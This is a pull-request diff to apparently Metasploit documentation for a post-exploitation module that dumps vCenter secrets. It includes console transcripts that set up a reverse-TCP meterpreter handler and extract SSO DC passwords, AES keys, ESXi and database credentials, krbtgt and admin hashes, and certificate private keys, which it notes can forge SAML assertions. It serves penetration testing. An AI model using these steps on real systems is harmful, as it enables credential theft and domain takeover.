### PR TITLE
Add vcenter_secrets_dump post module

### DIFF
--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -61,7 +61,7 @@ msf6 exploit(multi/handler) > exploit
 
 [*] Started reverse TCP handler on 192.168.101.10:4444 
 [*] Sending stage (989032 bytes) to 192.168.100.11
-[*] Meterpreter session 1 opened (192.168.101.10:4444 -> 192.168.100.11:53410 ) at 2022-04-28 16:22:17 -0400
+[*] Meterpreter session 1 opened (192.168.101.10:4444 -> 192.168.100.11:53410 ) at 2022-04-30 14:04:21 -0400
 
 meterpreter > bg
 [*] Backgrounding session 1...
@@ -71,37 +71,54 @@ session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
 [*] Gathering vSphere SSO domain information ...
-[*] vSphere Hostname and IPv4: vcenteralpha.cesium137.io [192.168.100.11]
-[+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
+[*] vSphere Hostname and IPv4: vcenteralpha..cesium137.io [192.168.100.11]
+[+] vSphere SSO DC DN: cn=vcenteralpha..cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
 [+] vSphere SSO DC PW: .AwoZ1;wd>x_b=M1FQ'}
+[*] Extract vmdird tenant AES encryption keys ...
+[+] vSphere Tenant AES encryption key: OY;OTk3<W}tH[ze| hex: 0x4f593b4f546b333c577d74485b7a657c
 [*] Extracting PostgreSQL database credentials ...
-[+] VCDB Name: VCDB
-[+] VCDB User: vc
-[+] VCDB PW: my6h@)IN1jW$nHT{
+[+] VCDB Name: VCDB User: vc PW: my6h@)IN1jW$nHT{
 [*] Extracting vSphere SSO domain information ...
 [*] Dumping vmdir schema to LDIF ...
-[+] LDIF Dump: /root/.msf4/loot/20220428162238_default_192.168.100.11_vmdir_339905.ldif
+[+] LDIF Dump: /home/cs137/.msf4/loot/20220430140904_default_192.168.100.11_vmdir_231364.ldif
 [*] Processing vmdir LDIF (this may take several minutes) ...
 [*] Processing LDIF entries ...
 [*] Processing SSO account hashes ...
-[+] vSphere SSO User Credential: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f48caa19007e8bb3d76a7d172e2d1976f4747e0ed84159a712eb58156ede7478827909bf4acf9f71b74616ce5110d99b8426d8b3295b02c04aacff3c27607ab8$HEX$9374651ada3414775604fbdb150c8cdc
+[+] vSphere SSO User Credential: cn=vcenteralpha..cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f48caa19007e8bb3d76a7d172e2d1976f4747e0ed84159a712eb58156ede7478827909bf4acf9f71b74616ce5110d99b8426d8b3295b02c04aacff3c27607ab8$HEX$9374651ada3414775604fbdb150c8cdc
 [+] vSphere SSO User Credential: CN=waiter 66bac9fd-6a99-43eb-8661-1295c39e9e4d,cn=users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$8335fa00d0498f1028691aced7d8945be0fa1f689dc628a3307ec7918a8fcdb04587ebd8a6dc1b14cacc0c11e4f84c5e022108e0950b62dc63f3f37c0a3b3453$HEX$4108122797d8894b9963e5ac943918b9
 [+] vSphere SSO User Credential: cn=krbtgt/ALPHA.VSPHERE.LOCAL,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$0da378937caf846413b0a9a328e9fe901513bddddea9a0de5ca520f4d7eca9d2eeb7287a26f0d079941bb46df36a5b321c53b807e59c55b10bb62ff260e28021$HEX$266ca458d66911df01347b372939ae2a
 [+] vSphere SSO User Credential: cn=K/M,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$c20ca496510e8e6a0d3d9aa470dfe0baf06ccfb2ecc2e4952d232859e8fc22ccd3108926eb115574043652157db3f1d557af1cd1580190546178758eee57834a$HEX$22209783f4c187b777a31c2a814c2ff7
 [+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f96cd214646ba2e4e21774a183f18572bc3d6c4174801d0523cbdc04d02bf69b102bfe9d68fdd71c5866f4972b2359516e65f59c4bda6eebd3cdca59b5f55be8$HEX$4f267135b496ff3119afc21fefda8643
-[+] vSphere SSO User Credential: cn=vmca/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ee963a2f36d38a73e5cf4be729e7be4f491c97fc91b3e9bed96216de9bf72914d1442c49650b07366e9347369ce892d823e06613195027e3f44dfd50662b98dc$HEX$842fdf0b5b972c8f722fb3139142231d
-[+] vSphere SSO User Credential: cn=ldap/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$85523e5ad2ac353b925a0cc9f0fad88c881b17d5b218fdd568fb819a7bc58abf7e8783013e22468c657cae7f776ec77fb8b0ad815ef5cdc6ea114c701f19fa52$HEX$4faf7011a11a4939216a1211a4b08cea
-[+] vSphere SSO User Credential: cn=DNS/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ad40b15f98588bc0c856a0f881ea857d6f3442a6755b9c33e40c7960d1833414d25ef96120f9416fca96d0ecfe3df6ddc1e992e5881baeacdcc4610bd43eda79$HEX$f3d9e1c742d9342c78c1825ab5b7efee
-[+] vSphere SSO User Credential: cn=host/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$bbcb9c30d8c1a40f409d24fe6ede60df7bf4860a9bdd50b146d063a194fdadb0df80d81ea5ea48a377f20709fa1c22f696facde785b160ceb0eb92eb5f8c5308$HEX$5fab6ef4332396fb4b4410cca448d52d
+[+] vSphere SSO User Credential: cn=vmca/vcenteralpha..cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ee963a2f36d38a73e5cf4be729e7be4f491c97fc91b3e9bed96216de9bf72914d1442c49650b07366e9347369ce892d823e06613195027e3f44dfd50662b98dc$HEX$842fdf0b5b972c8f722fb3139142231d
+[+] vSphere SSO User Credential: cn=ldap/vcenteralpha..cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$85523e5ad2ac353b925a0cc9f0fad88c881b17d5b218fdd568fb819a7bc58abf7e8783013e22468c657cae7f776ec77fb8b0ad815ef5cdc6ea114c701f19fa52$HEX$4faf7011a11a4939216a1211a4b08cea
+[+] vSphere SSO User Credential: cn=DNS/vcenteralpha..cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ad40b15f98588bc0c856a0f881ea857d6f3442a6755b9c33e40c7960d1833414d25ef96120f9416fca96d0ecfe3df6ddc1e992e5881baeacdcc4610bd43eda79$HEX$f3d9e1c742d9342c78c1825ab5b7efee
+[+] vSphere SSO User Credential: cn=host/vcenteralpha..cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$bbcb9c30d8c1a40f409d24fe6ede60df7bf4860a9bdd50b146d063a194fdadb0df80d81ea5ea48a377f20709fa1c22f696facde785b160ceb0eb92eb5f8c5308$HEX$5fab6ef4332396fb4b4410cca448d52d
+[*] Processing SSO identity sources ...
+[*] Found SSO Identity Source Credential:
+[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
+[+] SSOUSER: vcenteralpha..cesium137.io@alpha.vsphere.local
+[+] SSOPASS: .AwoZ1;wd>x_b=M1FQ'}
+[+] SSODOMAIN: alpha.vsphere.local
+[*] Found SSO Identity Source Credential:
+[+] IDENTITY_STORE_TYPE_LDAP_WITH_AD_MAPPING @ ldap://cesium137.io:3268:
+[+] SSOUSER: CESIUM137\ldap
+[+] SSOPASS: SamIAm!
+[+] SSODOMAIN: cesium137.io
 [*] Extracting certificates from vSphere platform ...
-[+] VMCA_ROOT key: /root/.msf4/loot/20220428162239_default_192.168.100.11_vmca_411348.key
-[+] VMCA_ROOT cert: /root/.msf4/loot/20220428162239_default_192.168.100.11_vmca_551671.pem
-[+] SSO_STS_IDP key: /root/.msf4/loot/20220428162241_default_192.168.100.11_idp_775724.key
-[+] SSO_STS_IDP cert: /root/.msf4/loot/20220428162241_default_192.168.100.11_idp_747430.pem
-[+] MACHINE_SSL_CERT key: /root/.msf4/loot/20220428162241_default_192.168.100.11_ssl_134237.key
-[+] MACHINE_SSL_CERT cert: /root/.msf4/loot/20220428162242_default_192.168.100.11_ssl_373472.pem
-[+] DATA-ENCIPHERMENT key: /root/.msf4/loot/20220428162243_default_192.168.100.11_data_033857.key
-[+] DATA-ENCIPHERMENT cert: /root/.msf4/loot/20220428162243_default_192.168.100.11_data_727693.pem
+[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220430140906_default_192.168.100.11_vmca_936623.key
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220430140907_default_192.168.100.11_vmca_555488.pem
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220430140909_default_192.168.100.11_idp_464049.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220430140909_default_192.168.100.11_idp_273306.pem
+[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220430140910_default_192.168.100.11_ssl_509899.key
+[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220430140910_default_192.168.100.11_ssl_581440.pem
+[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220430140911_default_192.168.100.11_data_110634.key
+[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220430140911_default_192.168.100.11_data_051751.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220430140912_default_192.168.100.11_webclient_908714.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220430140913_default_192.168.100.11_webclient_473307.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220430140913_default_192.168.100.11_vpxd_232400.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220430140914_default_192.168.100.11_vpxd_225856.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220430140915_default_192.168.100.11_vpxdext_365675.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220430140915_default_192.168.100.11_vpxdext_458408.pem
 [*] Searching for secrets in VM Guest Customization Specification XML ...
 [*] Initial administrator account password found for vpx_customization_spec 'Windows 10 Ent No Domain Join':
 [+] Built-in administrator PW: IAmSam!

--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -1,0 +1,72 @@
+Grab secrets and keys from the vCenter server and add them to loot. Secrets include the dcAccountDN
+and dcAccountPassword for the vCenter machine which can be used for maniuplating the SSO domain via
+standard LDAP interface; good for plugging into the vmware_vcenter_vmdir_ldap module or for adding
+new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with assocaited private keys
+are also plundered and can be used to sign forged SAML assertions for the /ui admin interface.
+
+## Vulnerable Application
+This module is tested against the vCenter appliance only; it will not work on Windows vCenter
+instances. It is intended to be run after successfully acquiring root access on a vCenter appliance
+and is useful for penetrating further into the environment following a vCenter exploit that results
+in a root shell. This module has been tested against vCenter appliance versions 7.0 and 6.7 but will
+probably work against other versions of vCenter appliance.
+
+## Verification Steps
+This is a post module and requires a meterpreter or shell session on the vCenter appliance with root
+access.
+
+1. Start msfconsole
+2. Get session on vCenter appliance via exploit of your choice and background it
+3. Do: `use post/linux/gather/vcenter_secrets_dump`
+4. Do: `set session <session>`
+15. Do: `dump`
+
+## Options
+**SESSION**
+
+Which session to use, which can be viewed with `sessions -l`
+
+## Scenarios
+Example run from meterpreter session on vCenter appliance version 7.0.2
+
+```
+msf6 > use multi/handler
+set payload linux/x86/meterpreter/reverse_tcp
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+set LPORT 4444
+msf6 exploit(multi/handler) > set LHOST 192.168.101.10
+LHOST => 192.168.101.10
+msf6 exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(multi/handler) > exploit
+
+[*] Started reverse TCP handler on 192.168.101.10:4444 
+[*] Sending stage (989032 bytes) to 192.168.100.11
+[*] Meterpreter session 1 opened (192.168.101.10:4444 -> 192.168.100.11:53410 ) at 2022-04-17 19:04:00 -0400
+
+meterpreter > bg
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
+msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
+session => 1
+msf6 post(linux/gather/vcenter_secrets_dump) > dump
+
+[*] Gathering vSphere SSO Domain Information ...
+[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
+[+] vSphere SSO DC DN: cn=vcenter.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: St"7qMYCj)V#PnwS\mw2
+[*] Extracting certificates from vSphere platform ...
+[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
+[*] Parsing vmwSTSTenantCredential certificates and keys ...
+[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
+[+] => CHA-CHING! <=
+[+] MACHINE_SSL_KEY: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_ssl_120856.key
+[+] MACHINE_SSL_CERT: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_ssl_144111.pem
+[+] VMCA_ROOT_KEY: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_vmca_345006.key
+[+] VMCA_ROOT_CERT: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_vmca_676785.pem
+[+] SSO_STS_IDP_KEY: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_idp_668987.key
+[+] SSO_STS_IDP_CERT: /home/cs137/.msf4/loot/20220417190437_default_192.168.100.11_idp_126310.pem
+[*] Post module execution completed
+```

--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -44,7 +44,7 @@ If DUMP_VMAFD is also true, attempt to extract VM Guest Customization secrets fr
 DATA-ENCIPHERMENT key extracted from VMAFD. Defaults to true.
 
 ## Scenarios
-Example run from meterpreter session on vCenter appliance version 7.0.2
+Example run from meterpreter session on vCenter appliance version 7.0 U3d
 
 ```
 msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
@@ -52,101 +52,95 @@ msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
 session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
-[*] VMware VirtualCenter 7.0.2 build-18356314
+[*] VMware VirtualCenter 7.0.3 build-19480866
 [*] Gathering vSphere SSO domain information ...
-[*] vSphere Hostname and IPv4: vcenter01.cesium137.io [192.168.100.11]
-[+] vSphere SSO DC DN: cn=vcenter01.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local
-[+] vSphere SSO DC PW: St!7qiz%33;2Px@A1cfb
-[*] Extract vmdird tenant AES encryption keys ...
-[+] vSphere Tenant AES encryption key: dyOiAcR(Lx' gp{: hex: 64794f69416352284c78272067707b3a
+[*] vSphere Hostname and IPv4: vcenterdelta.cesium137.io [192.168.100.70]
+[+] vSphere SSO DC DN: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: *6{ K3Ei*@<J[.gd5c3o
+[*] Extract vmdird tenant AES encryption key ...
+[+] vSphere Tenant AES encryption
+        KEY: K-Z(x7wf35{E"I2v
+        HEX: 4b2d5a287837776633357b4522493276
 [*] Extract vmware-vpx AES key ...
-[+] vmware-vpx AES encryption key hex: b3abd918ce326cf700b77da40b864ed73a6676310e791687e1e025d8d66f690f
+[+] vSphere vmware-vpx AES encryption
+        HEX: 9927ed2d42b80f9d3eec8e77441c63360c0c7bbed48076ff884efcfd27ef0682
 [*] Extracting PostgreSQL database credentials ...
-[+] VCDB Name: VCDB User: vc PW: XhsxOKLZ_0{tGC9#
+[+]     VCDB Name: VCDB
+[+]     VCDB User: vc
+[+]     VCDB Pass: 6!24A3W5LekCOPK=
 [*] Extract ESXi host vpxuser credentials ...
-[+] ESXi Host esxi01.cesium137.io [192.168.100.101] vpxuser PW: 3be=IDc}11gs$%v91^JgBO]BlI8}^:]Z
-[+] ESXi Host esxi02.cesium137.io [192.168.100.102] vpxuser PW: 1gp0o7o[~/Fk^b.5x52km\YIl.VsgTK8
+[+] ESXi Host esxi01d.cesium137.io [192.168.100.101]    LOGIN: vpxuser PASS: 3be=IDc}11FC8EJ1^JgBO]Bl7I8}^:]Z
+[+] ESXi Host esxi02d.cesium137.io [192.168.100.102]    LOGIN: vpxuser PASS: 1gp0o7o[~/Fk^1bqm0K1K\YIl.VsgTK8
 [*] Extracting vSphere SSO domain secrets ...
 [*] Dumping vmdir schema to LDIF ...
-[+] LDIF Dump: /home/cs137/.msf4/loot/20220503143428_dev_192.168.100.11_vmdir_442200.ldif
+[+] LDIF Dump: /home/cs137/.msf4/loot/20220504162039_default_192.168.100.70_vmdir_227362.ldif
 [*] Processing vmdir LDIF (this may take several minutes) ...
 [*] Processing LDIF entries ...
 [*] Processing SSO account hashes ...
-[+] vSphere SSO User Credential: CN=workload_storage_management-ec24f710-eb5f-4c56-8d75-04e3acd8a8c2,cn=ServicePrincipals,dc=vsphere,dc=local:$dynamic_82$33ddf30f6b0424709bc10cc0c9c5a8e5959379323fb9d334ee9fcfe39d97e6bd20e9fd39772eef62a00ee8d1aee5391a91dc4f14b4ddd23a343ffb99286912b6$HEX$7aa1f5b608ac139e0228b3641780f066
-[+] vSphere SSO User Credential: CN=workload_storage_management-0445bb8f-6d93-4542-b5f2-8e001f244c4d,cn=ServicePrincipals,dc=vsphere,dc=local:$dynamic_82$f36a754e1fe140469d474ed2bc38b9d2731dbf0fa5696d97b1a5ef43184afdf2c3fb34adfd53b5a64b9758aad1d8ceb95f3737c4b56f927130a5677f4e069024$HEX$255677e68a4cb70f248c0c1c5cc0d535
-[+] vSphere SSO User Credential: cn=vcenter01.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$261e4cf02319b07804641c2fc4857347067ad90d309f616388189bdb884a465a482b136be1123702c93edea030e690a78df52c7cc64c3e70e2b3a3711a198875$HEX$00c9af9c9f3dc42f45394a45680186f0
-[+] vSphere SSO User Credential: cn=vpsc02.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$c8dc9df7ba182c7d6936c410ab9c853f8c147bc7a46d0514103400aba645c5be793486f046a16c9eef9e59f1c96bff957800dfd0c0ae655ab96e07b232065f25$HEX$82d41cdccd86ced37414bff1c8d8677c
-[+] vSphere SSO User Credential: cn=vcenter02.cesium137.io,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$0ed0880ca0e729c500efb167b483b97438243240877d819068f3b72c48c1cb16b2a18b9eb7a9c837abcf1d3cbc178e7ac19ae67545d4a209160fafea077da3d5$HEX$c331dc88e73aabc8d96f50857c461b6c
-[+] vSphere SSO User Credential: CN=waiter-3caf7fef-84fa-4f93-93e5-adeeea22d421,cn=users,dc=vsphere,dc=local:$dynamic_82$5c28979073432937d71819dc359e7b0be0427abf124e80c0cbb826ee127f97c7a4f1c292aa82890d8d0872d610671c84c435ed5c4ed7f5fce0d3d1990943f6b2$HEX$599215fb7018265c2fa36a47b4ac6367
-[+] vSphere SSO User Credential: CN=waiter a8e38b28-999a-4ed8-ac8d-9ddf0609a713,cn=users,dc=vsphere,dc=local:$dynamic_82$1881e13ab2cb1fb07a14ad09abfead757e64c7c0f016517267a3b7f08fe6b8f769ec6a1e2186c50359a88ebe05eeef71be0e79d46c352614c4bea0228310d289$HEX$8bf5f1fc78282695c8302a65270488e5
-[+] vSphere SSO User Credential: CN=waiter 3699041e-1df3-4c9b-b19b-83089a0c1fd3,cn=users,dc=vsphere,dc=local:$dynamic_82$7cedf7b7509db4b7cd765a9420feb229c890d5ca2fede1cef9acde88c8dd47eb3100ac638c0cdfc835db87c7996dbdd306229e3c82d4d59c5f1074a60be601c3$HEX$02b97b55a88e9a0da17009f5f2cbbba3
-[+] vSphere SSO User Credential: CN=waiter 39b36112-8919-44a3-9bb4-16220d893685,cn=users,dc=vsphere,dc=local:$dynamic_82$f3c082819e1efb8af638d3babf414d50a04711df95912e33eeeba416eed4b5dac64c6e099b8669697ef07a3e7eb2143b422838c26c30d053843c8d203c0a47ae$HEX$09a6f94e00ef8c31dcd02b51f1f32424
-[+] vSphere SSO User Credential: CN=waiter 7d8434a8-add2-430a-9457-f5f15d9a74b8,cn=users,dc=vsphere,dc=local:$dynamic_82$f2a6ebbb6dcb5abc870e2f1ad84db9e6e631b7a262e247e4188b7afe1cd42c49db3a08b6334a115af95e9a327294f81d9f0672e7b4a637203d4a1c92da81bad6$HEX$00a3aff20941067ce84156dd13b61107
-[+] vSphere SSO User Credential: CN=waiter-7bbefce3-9e0d-49c0-a204-9d275af3d259,cn=users,dc=vsphere,dc=local:$dynamic_82$e6f4e99f3b7990af327246bb8cd4c66933fcd86b97441da875029482f7a290fc4e5eea0e753cb8ee89cb4531730e5ff631349fc65456af6fc9e79505b22ec57d$HEX$13075497741d56d0d71f0b1eedb878ea
-[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$360cbc987ac2a96862ca30951ee34810e850b2976aab6a799f6a0158e43c72bda4525159c5aee958b4d567d125823f7040d0efe2ca36140a41b0e42230ce55ae$HEX$438a4343f8df8811b18af35246f5309f
-[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$c92391404befe611ad2f9c20d6f521fb183a6d30762b44961cf9ace1714032721570c942cff57c38a8d3dbaafa2841819318b0308f2dba8e4ae0603a7c784ab7$HEX$e048ed8e208704464f688bce99e330b0
-[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$b5ca7b488446b18c3fb94a348d16fc336c86af43b7b2ae8410984f09b3f7245ac00bf40a62c1efde98d94e333945c5a1ab385d365bac378016f337f39ac3489e$HEX$a021eafda1cec51c7cdf519b80ae549c
-[+] vSphere SSO User Credential: CN=metasploit,CN=Users,dc=vsphere,dc=local:$dynamic_82$1caf99644bf6ccc50dac6013e8904ce8b0b0eff16b794598f04d2f7397bab2927d35cef9e320b16342384287a08b10b38a6583bd7d535117751bdc0980798264$HEX$ac970912b2ba39c356bb744317119df3
-[+] vSphere SSO User Credential: cn=vmca/vcenter01.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$ef489edafd1d83898fae1f722db842a968fbbe217df75cae9fe92f8dafb3a35d4ab8893f9593611b1227bfcd9819f09504d3eccfb19156b221a6d2ca9ec8fd2e$HEX$77a9dc5f4dfda08d807e0bc619ccfca4
-[+] vSphere SSO User Credential: cn=ldap/vcenter01.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$f5495355fae1701486912bde4ad9f70c74e080f74f314da54b518b8f8607f2f927cfb95363398612c1896938e5f8c3434564429e7f5824ec7728222f0ece682f$HEX$3c2b68f41dbba61f5a523f75f31b60ee
-[+] vSphere SSO User Credential: cn=DNS/vcenter01.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$e74daf82ff2d2bf4df8d61bdce19e45b2be0cda688e5f1d6bd08c9f24c9d192af3c68da9a634dec22e2a51bc28c75df3c23745346ffd47db5975fad177d1a555$HEX$bc9a096a52fe56b7a815bebc7bb8f4fe
-[+] vSphere SSO User Credential: cn=host/vcenter01.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$6dda0cb0b521e266a145c707e3f2557cbfb0ec741dfb26abc777e3f85ff2320d3fcb4f8fd8f1d2e1f32c756f08f0b5cc693b561617124abd4d8ac93f8bbef9a4$HEX$92035bd0b5a71a480a406dfd79f82f9b
-[+] vSphere SSO User Credential: cn=vmca/vpsc02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$594c04de02a30041b6448c344664bc53c7e232a1ee6d5e29ac358d47834bf77054403235699ebe9f91439dcf8fda4e4728d5532a4dddb8f548a259eeb3590061$HEX$addf629942720b8f102cfb96b192bc8b
-[+] vSphere SSO User Credential: cn=ldap/vpsc02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$9abbb4a19a4c6f107f36dd8b708f5f151f4f744d7437335c976e4e8adb5c7e286741a75ad14bb585f44780c8ff0792efe3abb1cf5f4330cf4a0cf6556466d0bf$HEX$58d6addcb4ee52df4988302b6a2f2310
-[+] vSphere SSO User Credential: cn=host/vpsc02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$5a9724d4acf93f9c1c20afb2f9f64a828df3dacc36f846450c9f07bab725184627393a36aa13e2bc6f8ddbd06e1e6e5a17e4f8892aee7df56aa298268a2ba8ca$HEX$03f238946b6341e6602d74d003fe4042
-[+] vSphere SSO User Credential: cn=vmca/vcenter02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$29f0ad0bb606fc4e1dc3af70fc5e9ccb08f1255bb926a5700a3682c83e2a1a732968ed0a2da74455e2c2a2384b670b30dd817a1f0e48f5cdc242db4e6b8aee39$HEX$e1e24ff54acaa46d56875ae4c66683e7
-[+] vSphere SSO User Credential: cn=ldap/vcenter02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$7e9c85e1a314dbaedbf52407dee2aacb10b3a52650e6e3dd74dae1e155c856588e6079534942e0510dfd51c847f3b55b9341b19c85f9a151227e58c21a365f1e$HEX$ce394a2c15db9c5005f6358ce8d1a020
-[+] vSphere SSO User Credential: cn=DNS/vcenter02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$624f0f9887910b0498b5da5e142b4ee1ba98c5384f188b9bc134a73f27688416e96ea001072cfa3ffb2a30a2a432d635661b46d7335b48ad963327c1041bd2b1$HEX$a23bdbb173b3af717692617df06de4d5
-[+] vSphere SSO User Credential: cn=host/vcenter02.cesium137.io@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$de963b26e0e66f6115d5dedf3453da6690bbc06888400fa9126dc306f32866d44315c4e6e87fa9fd3f6f62be458a2170392e0ac8af16d3e59628253da8a8463b$HEX$a495926b9d71302a594d0c303ffb86cd
+[+] vSphere SSO User Credential: CN=workload_storage_management-07afcee6-c2e2-4d0a-aa28-0305ab5825a4,cn=ServicePrincipals,dc=delta,dc=vsphere,dc=local:$dynamic_82$4bb329cd5a078c7b22b2f2bafd65f1c58e523d2d3f85ff75f51763d32c2769893a5fdb35e36e4217f1dcc9e10f1cfdaf495fdcc9ea5bf3fbfd8017bd57614d05$HEX$050a7a45b3ad8ee24a815b41c94b5fc9
+[+] vSphere SSO User Credential: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local:$dynamic_82$d857c278b1dfa799e293f0f35551d29b01973c24ef9e2c0e079d09049826ca824757f8377e7646e003272a39ae459a66c5fca54ac76eb67ddc5d1133cb4c4628$HEX$4ae8badb536deab2c3be64d3a1dfeb2e
+[+] vSphere SSO User Credential: CN=waiter-0ad33e8d-0ca0-4912-8eb0-0a80a16fda82,cn=users,dc=delta,dc=vsphere,dc=local:$dynamic_82$9a9dd8ec92a332b91b7602d45404a144973c75f54111ecf7cdfa70cea29e358838132f8380361091a40efdf52c5ac34cfd988574e489a83e2c1f1438c764bad0$HEX$2971d8fd5160de2e71a0dfa744af5d6b
+[+] vSphere SSO User Credential: cn=krbtgt/DELTA.VSPHERE.LOCAL,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$41437d26f1d4c2cdc67cff7ec66f91da643cb4b331fc00fa052ace43e4eae7ef277f9b9b05d5c06c46f5b73bc2132ed772552274464098d2479604161a001d32$HEX$5a21a4b810348c78f9997a3c405f3340
+[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$aa0ef201580566738898162a079c70daa0bb19be0927d6b44ac3d65724df1e14cd6c273c132cd117b98ed8c7b37d2ae861d96e6ff28e97e81f54629072a83e62$HEX$031df0af1964ea1e5c733541f2f89a7d
+[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=delta,dc=vsphere,dc=local:$dynamic_82$cd4362341bb01e2de096c262c59e3c6f8bedf78ae96f378de57e369d5071f114fba4c43c4d577317ea3d923eafa9b9a6f6154a10d0e81f7fa00fb711b3519a8c$HEX$0155fb261f868fbf8f3feda9139acc50
